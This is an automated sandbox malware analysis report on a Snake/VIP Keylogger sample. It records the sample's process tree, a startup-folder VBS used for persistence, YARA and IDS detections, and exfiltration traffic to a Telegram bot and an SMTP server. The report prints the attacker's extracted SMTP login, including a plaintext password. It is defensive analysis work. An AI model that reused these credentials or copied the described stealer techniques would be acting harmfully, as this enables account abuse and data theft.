Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
oagkiAhXgZ.exe

Overview

General Information

Sample name:oagkiAhXgZ.exe
renamed because original name is a hash value
Original sample name:fef805cfe8df23b5e42e59c3505ba7b9014c2cf3e9ac9346b3badba3c086053c.exe
Analysis ID:1585976
MD5:eb8c8acae9d3a669129902384f5335b2
SHA1:f0f9aa5f20c2721eacc7e2b660c46b585b653ee2
SHA256:fef805cfe8df23b5e42e59c3505ba7b9014c2cf3e9ac9346b3badba3c086053c
Tags:exeMassLoggeruser-adrian__luca
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code references suspicious native API functions
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Contains functionality to capture screen (.Net source)
Contains functionality to log keystrokes (.Net Source)
Drops VBS files to the startup folder
Found API chain indicative of sandbox detection
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Generic Downloader
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • oagkiAhXgZ.exe (PID: 1876 cmdline: "C:\Users\user\Desktop\oagkiAhXgZ.exe" MD5: EB8C8ACAE9D3A669129902384F5335B2)
    • reindulgence.exe (PID: 768 cmdline: "C:\Users\user\Desktop\oagkiAhXgZ.exe" MD5: EB8C8ACAE9D3A669129902384F5335B2)
      • RegSvcs.exe (PID: 4612 cmdline: "C:\Users\user\Desktop\oagkiAhXgZ.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • wscript.exe (PID: 1472 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\reindulgence.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • reindulgence.exe (PID: 5316 cmdline: "C:\Users\user\AppData\Local\Thebesian\reindulgence.exe" MD5: EB8C8ACAE9D3A669129902384F5335B2)
      • RegSvcs.exe (PID: 5488 cmdline: "C:\Users\user\AppData\Local\Thebesian\reindulgence.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Email ID": "sammys@gtpv.online", "Password": "7213575aceACE@@", "Host": "mail.gtpv.online", "Port": "587"}
{"Exfil Mode": "SMTP", "Username": "sammys@gtpv.online", "Password": "7213575aceACE@@", "Host": "mail.gtpv.online", "Port": "587", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
00000002.00000002.2093048614.0000000001B40000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000002.00000002.2093048614.0000000001B40000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      00000002.00000002.2093048614.0000000001B40000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
        00000002.00000002.2093048614.0000000001B40000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          00000002.00000002.2093048614.0000000001B40000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
          • 0x2dca0:$a1: get_encryptedPassword
          • 0x2e228:$a2: get_encryptedUsername
          • 0x2d913:$a3: get_timePasswordChanged
          • 0x2da2a:$a4: get_passwordField
          • 0x2dcb6:$a5: set_encryptedPassword
          • 0x309d2:$a6: get_passwords
          • 0x30d66:$a7: get_logins
          • 0x309be:$a8: GetOutlookPasswords
          • 0x30377:$a9: StartKeylogger
          • 0x30cbf:$a10: KeyLoggerEventArgs
          • 0x30417:$a11: KeyLoggerEventArgsEventHandler
          Click to see the 31 entries
          SourceRuleDescriptionAuthorStrings
          2.2.reindulgence.exe.1b40000.1.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            2.2.reindulgence.exe.1b40000.1.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
              2.2.reindulgence.exe.1b40000.1.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                2.2.reindulgence.exe.1b40000.1.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                • 0x2bea0:$a1: get_encryptedPassword
                • 0x2c428:$a2: get_encryptedUsername
                • 0x2bb13:$a3: get_timePasswordChanged
                • 0x2bc2a:$a4: get_passwordField
                • 0x2beb6:$a5: set_encryptedPassword
                • 0x2ebd2:$a6: get_passwords
                • 0x2ef66:$a7: get_logins
                • 0x2ebbe:$a8: GetOutlookPasswords
                • 0x2e577:$a9: StartKeylogger
                • 0x2eebf:$a10: KeyLoggerEventArgs
                • 0x2e617:$a11: KeyLoggerEventArgsEventHandler
                2.2.reindulgence.exe.1b40000.1.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
                • 0x3949e:$a2: \Comodo\Dragon\User Data\Default\Login Data
                • 0x38b41:$a3: \Google\Chrome\User Data\Default\Login Data
                • 0x38d9e:$a4: \Orbitum\User Data\Default\Login Data
                • 0x3977d:$a5: \Kometa\User Data\Default\Login Data
                Click to see the 21 entries

                System Summary

                barindex
                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\reindulgence.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\reindulgence.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\reindulgence.vbs" , ProcessId: 1472, ProcessName: wscript.exe
                Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\reindulgence.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\reindulgence.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\reindulgence.vbs" , ProcessId: 1472, ProcessName: wscript.exe

                Data Obfuscation

                barindex
                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe, ProcessId: 768, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\reindulgence.vbs
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-08T15:44:07.334959+010028033053Unknown Traffic192.168.2.549706188.114.96.3443TCP
                2025-01-08T15:44:08.719105+010028033053Unknown Traffic192.168.2.549708188.114.96.3443TCP
                2025-01-08T15:44:10.024728+010028033053Unknown Traffic192.168.2.549710188.114.96.3443TCP
                2025-01-08T15:44:15.290825+010028033053Unknown Traffic192.168.2.549718188.114.96.3443TCP
                2025-01-08T15:44:24.025560+010028033053Unknown Traffic192.168.2.549766188.114.96.3443TCP
                2025-01-08T15:44:29.389726+010028033053Unknown Traffic192.168.2.549810188.114.96.3443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-08T15:44:05.738136+010028032742Potentially Bad Traffic192.168.2.549704132.226.247.7380TCP
                2025-01-08T15:44:06.722541+010028032742Potentially Bad Traffic192.168.2.549704132.226.247.7380TCP
                2025-01-08T15:44:08.066253+010028032742Potentially Bad Traffic192.168.2.549707132.226.247.7380TCP
                2025-01-08T15:44:22.284959+010028032742Potentially Bad Traffic192.168.2.549754132.226.247.7380TCP
                2025-01-08T15:44:23.456846+010028032742Potentially Bad Traffic192.168.2.549754132.226.247.7380TCP
                2025-01-08T15:44:24.753710+010028032742Potentially Bad Traffic192.168.2.549772132.226.247.7380TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-08T15:44:17.531327+010018100071Potentially Bad Traffic192.168.2.549726149.154.167.220443TCP
                2025-01-08T15:44:34.287910+010018100071Potentially Bad Traffic192.168.2.549844149.154.167.220443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: oagkiAhXgZ.exeAvira: detected
                Source: http://anotherarmy.dns.army:8081Avira URL Cloud: Label: phishing
                Source: http://aborters.duckdns.org:8081Avira URL Cloud: Label: phishing
                Source: http://varders.kozow.com:8081Avira URL Cloud: Label: malware
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeAvira: detection malicious, Label: HEUR/AGEN.1319493
                Source: 00000002.00000002.2093048614.0000000001B40000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "sammys@gtpv.online", "Password": "7213575aceACE@@", "Host": "mail.gtpv.online", "Port": "587", "Version": "4.4"}
                Source: 2.2.reindulgence.exe.1b40000.1.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "sammys@gtpv.online", "Password": "7213575aceACE@@", "Host": "mail.gtpv.online", "Port": "587"}
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeReversingLabs: Detection: 63%
                Source: oagkiAhXgZ.exeReversingLabs: Detection: 63%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeJoe Sandbox ML: detected
                Source: oagkiAhXgZ.exeJoe Sandbox ML: detected

                Location Tracking

                barindex
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: oagkiAhXgZ.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49705 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49760 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49726 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49844 version: TLS 1.2
                Source: Binary string: wntdll.pdbUGP source: reindulgence.exe, 00000002.00000003.2091283334.0000000003B20000.00000004.00001000.00020000.00000000.sdmp, reindulgence.exe, 00000002.00000003.2091160949.0000000003980000.00000004.00001000.00020000.00000000.sdmp, reindulgence.exe, 00000006.00000003.2255477042.0000000003960000.00000004.00001000.00020000.00000000.sdmp, reindulgence.exe, 00000006.00000003.2256338604.00000000037C0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: reindulgence.exe, 00000002.00000003.2091283334.0000000003B20000.00000004.00001000.00020000.00000000.sdmp, reindulgence.exe, 00000002.00000003.2091160949.0000000003980000.00000004.00001000.00020000.00000000.sdmp, reindulgence.exe, 00000006.00000003.2255477042.0000000003960000.00000004.00001000.00020000.00000000.sdmp, reindulgence.exe, 00000006.00000003.2256338604.00000000037C0000.00000004.00001000.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00B0DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_00B0DBBE
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00ADC2A2 FindFirstFileExW,0_2_00ADC2A2
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00B168EE FindFirstFileW,FindClose,0_2_00B168EE
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00B1698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_00B1698F
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00B0D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00B0D076
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00B0D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00B0D3A9
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00B19642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00B19642
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00B1979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00B1979D
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00B19B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00B19B2B
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00B15C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00B15C97
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeCode function: 2_2_00FCDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,2_2_00FCDBBE
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeCode function: 2_2_00F9C2A2 FindFirstFileExW,2_2_00F9C2A2
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeCode function: 2_2_00FD68EE FindFirstFileW,FindClose,2_2_00FD68EE
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeCode function: 2_2_00FD698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,2_2_00FD698F
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeCode function: 2_2_00FCD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00FCD076
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeCode function: 2_2_00FCD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00FCD3A9
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeCode function: 2_2_00FD9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00FD9642
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeCode function: 2_2_00FD979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00FD979D
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeCode function: 2_2_00FD9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,2_2_00FD9B2B
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeCode function: 2_2_00FD5C97 FindFirstFileW,FindNextFileW,FindClose,2_2_00FD5C97
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0275F8E9h3_2_0275F631
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0275FD41h3_2_0275FA88
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 063331E0h3_2_06332DC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06330D0Dh3_2_06330B30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06331697h3_2_06330B30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06332C19h3_2_06332968
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0633E0A9h3_2_0633DE00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0633E959h3_2_0633E6B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0633F209h3_2_0633EF60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0633CF49h3_2_0633CCA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0633D7F9h3_2_0633D550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 063331E0h3_2_06332DBF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0633E501h3_2_0633E258
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0633EDB1h3_2_0633EB08
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0633F661h3_2_0633F3B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0633FAB9h3_2_0633F810
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h3_2_06330040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0633D3A1h3_2_0633D0F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 063331E0h3_2_0633310E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0633DC51h3_2_0633D9A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0126F8E9h7_2_0126F644
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0126FD41h7_2_0126FA9C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 01AD31E0h7_2_01AD2DC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 01AD2C19h7_2_01AD2968
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 01AD0D0Dh7_2_01AD0B30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 01AD1697h7_2_01AD0B30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 01ADDC51h7_2_01ADD9A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 01AD31E0h7_2_01AD2DC3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 01AD31E0h7_2_01AD310E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 01ADD7F9h7_2_01ADD550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 01ADCF49h7_2_01ADCCA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 01ADD3A1h7_2_01ADD0F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 01ADFAB9h7_2_01ADF810
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h7_2_01AD0040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h7_2_01AD0853
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 01ADF661h7_2_01ADF3B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 01ADEDB1h7_2_01ADEB08
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 01ADF209h7_2_01ADEF60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 01ADE959h7_2_01ADE6B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 01ADE0A9h7_2_01ADDE00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h7_2_01AD0673
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 01ADE501h7_2_01ADE258

                Networking

                barindex
                Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:49726 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:49844 -> 149.154.167.220:443
                Source: unknownDNS query: name: api.telegram.org
                Source: Yara matchFile source: 6.2.reindulgence.exe.1080000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.reindulgence.exe.1b40000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.2093048614.0000000001B40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2261208813.0000000001080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:610930%0D%0ADate%20and%20Time:%2008/01/2025%20/%2020:59:22%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20610930%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:610930%0D%0ADate%20and%20Time:%2008/01/2025%20/%2021:09:38%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20610930%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownDNS query: name: checkip.dyndns.org
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49707 -> 132.226.247.73:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49704 -> 132.226.247.73:80
